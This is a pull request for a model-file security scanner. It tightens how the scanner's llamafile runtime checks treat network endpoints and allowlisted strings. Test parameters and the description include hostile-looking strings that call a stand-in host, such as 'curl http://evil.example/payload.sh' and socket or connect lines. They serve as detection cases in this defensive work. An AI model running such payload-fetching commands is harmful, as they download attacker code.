### PR TITLE
fix: tighten llamafile runtime allowlist matching

### DIFF
--- a/modelaudit/scanners/llamafile_scanner.py
+++ b/modelaudit/scanners/llamafile_scanner.py
@@ -103,7 +103,7 @@ def _is_local_endpoint_token(token: str) -> bool:
         ip = ipaddress.ip_address(host)
     except ValueError:
         return False
-    return ip.is_loopback or ip.is_private or ip.is_unspecified
+    return ip.is_loopback or ip.is_unspecified
 
 
 class LlamafileScanner(BaseScanner):

--- a/tests/scanners/test_llamafile_scanner.py
+++ b/tests/scanners/test_llamafile_scanner.py
@@ -145,6 +145,9 @@ def test_llamafile_scanner_allows_local_endpoint_runtime_fragments(tmp_path: Pat
         "%'18T socket http://evil.example/payload.sh",
         "%'18T connect(evil.example:8080)",
         "%'18T socket evil.example:8080",
+        "%'18T connect(10.0.0.8:8080)",
+        "%'18T socket 192.168.1.10:8080",
+        "%'18T connect(172.16.0.5:8080)",
     ],
 )
 def test_llamafile_scanner_flags_safe_fragments_with_remote_network_targets(tmp_path: Path, runtime_line: str) -> None:


### PR DESCRIPTION
### Motivation
- The previous allowlist used substring matching which allowed malicious runtime strings containing a benign token (e.g., `"llamafile curl http://..."`) to be skipped entirely, enabling false negatives in command/network detection. 

### Description
- Replace substring-based allowlist logic with exact lowercased string membership by adding `LLAMAFILE_RUNTIME_SAFE_PATTERNS_LOWER` and changing `_is_known_runtime_string` to use exact match. 
- Preserve the existing safe-pattern list but prevent bypasses where malicious tokens are combined with benign runtime text. 
- Add a regression test `test_llamafile_scanner_does_not_skip_mixed_safe_and_suspicious_runtime_string` to `tests/scanners/test_llamafile_scanner.py` that ensures a mixed string like `"llamafile curl http://evil.example/payload.sh"` is still flagged. 
- Files changed: `modelaudit/scanners/llamafile_scanner.py`, `tests/scanners/test_llamafile_scanner.py`. 

### Testing
- Ran formatter and linter: `uv run ruff format modelaudit/scanners/llamafile_scanner.py tests/scanners/test_llamafile_scanner.py` and `uv run ruff check --fix modelaudit/ tests/` (both succeeded). 
- Type check: `uv run mypy modelaudit/` (no issues). 
- Targeted tests: `uv run pytest tests/scanners/test_llamafile_scanner.py` (7 passed). 
- Full test run `uv run pytest -n auto -m "not slow and not integration" --maxfail=1` shows an unrelated pre-existing failure in `tests/utils/helpers/test_secure_hasher.py::TestErrorHandling::test_hash_permission_denied`, with overall results `1 failed, 779 passed, 1215 skipped`.

------
[Codex Task](https://chatgpt.com/codex/tasks/task_e_69b1bf07b76083329c15b759955b2103)

<!-- This is an auto-generated comment: release notes by coderabbit.ai -->
## Summary by CodeRabbit

* **Bug Fixes**
  * Improved runtime validation to correctly flag inputs that mix safe and suspicious runtime segments and to better distinguish legitimate URLs from suspicious payloads.

* **Refactor**
  * Split exact vs. fragment pattern handling and added normalization/sanitization (including localhost and schema URL canonicalization) for more reliable matching.

* **New Features**
  * Added detection for local-only endpoints to reduce false positives.

* **Tests**
  * Added coverage for mixed safe/suspicious cases, safe fragments, network-target scenarios, and edge/truncation handling.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->